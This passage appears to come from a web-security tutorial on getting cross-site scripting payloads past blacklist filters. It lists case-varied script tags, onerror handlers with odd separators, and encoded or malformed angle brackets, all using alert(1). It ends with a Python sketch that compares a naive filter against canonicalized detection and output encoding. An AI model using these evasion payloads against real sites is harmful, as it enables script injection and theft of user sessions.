Bypassing filters using tag modifiers

A good trick is to slightly modify the tag names used in the payload string. To a blacklist, for example, the following two lines are not the same:

    <script>alert(1)</script>
    <ScrIPt>alert(1)</ScrIPT>

Browsers interpret both lines in the same way, because HTML tag names are case-insensitive, but to some filters the second line is not a malicious string.

Another trick is to replace the spaces with other characters to avoid the filters, as here:

    <img/onerror=alert(1) src=a>
    <img[%09]onerror=alert(1) src=a>
    <img[%0d]onerror=alert(1) src=a>
    <img[%0a]onerror=alert(1) src=a>
    <img/"onerror=alert(1) src=a>
    <img/'onerror=alert(1) src=a>

Another trick is to modify the angle brackets, either by using encoding techniques or by simply replacing them with values the filter accepts:

    %253cimg%20onerror=alert(1)%20src=a%253e
    «img onerror=alert(1) src=a»
    <<script>alert(1);//<</script>
    <script<{alert(1)}/></script>
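
Seen from the defender's side, the variants above explain why a literal blacklist is not a control. The following Python sketch is an added example, not code from the book: it runs a few of the strings shown above through a naive substring filter, a canonicalize-then-match detection check, and output encoding. All function names are hypothetical, and the `[%09]` notation is assumed to stand for the URL-encoded byte `%09`.

```python
import html
import re
from urllib.parse import unquote

# Variants taken from the text above ([%09] written as the URL escape %09).
SAMPLES = [
    "<script>alert(1)</script>",
    "<ScrIPt>alert(1)</ScrIPT>",
    "<img/onerror=alert(1) src=a>",
    "<img%09onerror=alert(1) src=a>",
    "%253cimg%20onerror=alert(1)%20src=a%253e",
    "<<script>alert(1);//<</script>",
]

def naive_blacklist(value):
    """Weak filter: case-sensitive substring match. True means 'allowed'."""
    return "<script>" not in value and "<img onerror" not in value

def canonicalize(value, max_rounds=5):
    """URL-decode until the value stops changing (bounded), then lowercase."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value.lower()

# A script tag, or any tag carrying an on* handler after a space, slash or quote.
SUSPICIOUS = re.compile(r"<\s*script\b|<[^>]*[\s/\"']on[a-z]+\s*=")

def flag_for_review(value):
    """Detection on the canonical form: useful for logging, not a primary defence."""
    return bool(SUSPICIOUS.search(canonicalize(value)))

def render_safely(value):
    """Primary defence: encode on output so markup characters are inert."""
    return html.escape(value, quote=True)

def missed_by_blacklist():
    """Samples the naive filter allows although the canonical form is flagged."""
    return [s for s in SAMPLES if naive_blacklist(s) and flag_for_review(s)]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(f"allowed={naive_blacklist(sample)!s:5} "
              f"flagged={flag_for_review(sample)!s:5} "
              f"rendered={render_safely(sample)}")
```

The detection pattern is deliberately broad and will flag some benign text; the encoding step is what actually neutralizes the input when it is written into an HTML body context.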